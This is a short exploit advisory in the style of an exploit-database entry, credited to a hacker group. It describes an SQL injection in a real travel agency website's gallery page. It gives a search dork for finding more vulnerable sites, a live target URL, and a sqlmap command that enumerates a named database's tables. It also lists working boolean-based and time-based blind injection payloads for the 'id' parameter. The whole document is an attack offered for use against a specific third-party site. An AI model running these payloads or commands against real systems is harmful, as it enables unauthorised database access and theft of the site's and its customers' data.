# Exploit Title:skystartravels  SQL Injection
# Date:17.05.2019
# Dork :intext:"All Rights Reserved to www.skystartravels.com" gallery.php?id=1
# Exploit Author:Cerkuday // CyberWarrior TİM AKINCILAR
# Tested on:Windows &Kali Linux


#Demo:
https://www.skystartravels.com/gallery.php?id=1


# Poc:


sqlmap.py -u "https://www.skystartravels.com/gallery.php?id=1"  --random-agent -D skystart_data --tables

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 6484=6484 AND 'VhsK'='VhsK

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'SZqU'='SZqU
---